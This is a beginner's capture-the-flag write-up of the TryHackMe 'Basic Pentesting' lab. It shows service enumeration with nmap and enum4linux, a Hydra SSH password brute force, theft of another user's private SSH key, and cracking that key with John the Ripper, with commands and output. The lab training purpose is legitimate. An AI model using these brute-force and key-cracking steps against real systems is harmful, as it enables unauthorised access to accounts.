This is a machine that allows you to practise web app hacking and privilege escalation
Basic Pentesting. I'd completely forgotten about writing this. Since I had this writeup collecting binary dust on my hard drive why not publish it with some slight improvements? I didn't re-do the challenge to verify that everything checks out though.
This writeup contains some minor spoilers (usernames).
Task 1 Web App Testing and Privilege Escalation
In these set of tasks you'll learn the following:
- brute forcing
- hash cracking
- service enumeration
- Linux Enumeration
The main goal here is to learn as much as possible.
Deploy the machine and connect to our network
$: sudo openvpn [REDACTED].ovpn
in a terminal.
Find the services exposed by the machine
$: nmap $target
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-08 23:07 CET Nmap scan report for $target Host is up (0.075s latency). Not shown: 996 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds Nmap done: 1 IP address (1 host up) scanned in 1.35 seconds
Inspecting the web server gives us the following information:
<html> <h1>Undergoing maintenance</h1> <h4>Please check back later</h4> <!-- Check our dev note section if you need to know what to work on. --> </html>
What is the name of the hidden directory on the web server?
Now run dirbuster, I used the GUI with the wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt.
This will get us /development/
Visiting http://$target/development we find two files:
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K 2018-04-22: SMB has been configured. -K 2018-04-21: I got Apache set up. Will put in our content later. -J
For J: I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP. -K
From this we get some useful information. We know that we have at least two users on the system 'k' and 'j' where the later is known to have a weak password.
What is the username?
In the nmap output we saw that there was open SMB ports.
$: enum4linux -a $target
we get lots of information on the samba setup ending with:
... S-1-5-21-2853212168-2008227510-3551253869-1037 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1038 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1039 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1040 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1041 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1042 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1043 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1044 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1045 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1046 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1047 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1048 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1049 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1050 *unknown*\*unknown* (8) ![pic](+) Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\kay (Local User) S-1-22-1-1001 Unix User\jan (Local User)
So we found the user names 'kay' and 'jan'!
What is the password?
Since we know, from the notes, that jan has a weak password we can try to crack it by attacking the SSH server with Hydra.
$: hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://$target Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-08 23:30:19 ![pic](WARNING) Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 ![pic](DATA) max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task ![pic](DATA) attacking ssh://$target:22/ ![pic](STATUS) 178.00 tries/min, 178 tries in 00:01h, 14344223 to do in 1343:06h, 16 active ![pic](STATUS) 127.33 tries/min, 382 tries in 00:03h, 14344019 to do in 1877:30h, 16 active ![pic](22)[ssh] host: $target login: jan password: [REDACTED] 1 of 1 target successfully completed, 1 valid password found ![pic](WARNING) Writing restore file because 4 final worker threads did not complete until end. ![pic](ERROR) 4 targets did not resolve or could not be connected ![pic](ERROR) 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-08 23:36:55
The password of jan is [REDACTED].
What service do you use to access the server?
We can now access the server via SSH using this password.
Looking around we at first find nothing interesting. We go to the home directory of kay. Here we find a file pass.bak but permission denied. We can't read it. But looking in /home/kay/.ssh we find a readable private RSA key. Note to self: make sure that SSH keys always has proper permissions.
There is also a note in authorized_keys along the lines of
I don't have to type long passwords anymore
Stealing id.rsa to our work station. The first thing we try is of course to login directly using this key in hope that the key has no password protection.
$: ssh -i id_rsa kay@$target
But we have no such luck.
However, the note indicated that the key has a short-ish password so maybe we can crack it?
First, we must convert it to a John The Ripper friendly format.
$: /usr/share/john/ssh2john.py key > hash
Then we run John with the classic rockyou wordlist.
$: john hash -wordlist=/usr/share/wordlists/rockyou.txt Created directory: /home/[REDACTED]/.john Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status [REDACTED] (key) 1g 0:00:00:09 DONE (2021-03-09 00:02) 0.1003g/s 1438Kp/s 1438Kc/s 1438KC/s *7¡Vamos! Session completed The password is '[REDACTED]'!
We can now login:
$: ssh -i id_ra kay@$target $: cat pass.bak [REDACTED]
And we are done, room completed!
I found this writeup lying around collecting dust in my wiki. Completely forgotten. I was initially surprised how decent this writeup was but that's just because I mostly copied stuff from this video walkthrough.
Actually that video was how I found out about TryHackMe and Basic Pentesting was the very first challenge I "solved". I thought it would be fun to publish a writeup of my very first CTF.
At the time, I was clueless and had absolutely no idea what I was doing. I knew most of the tools but my experience of using them prior to this was limited, to say the least. Maybe with the exception of Nmap.
Despite just following the video walkthrough, I distinctly remember it being a very good feeling when I got in.
This challenge would probably be slightly too easy for me now. Which means that I've progressed.
I'm glad I found out about Gobuster.
- John the Ripper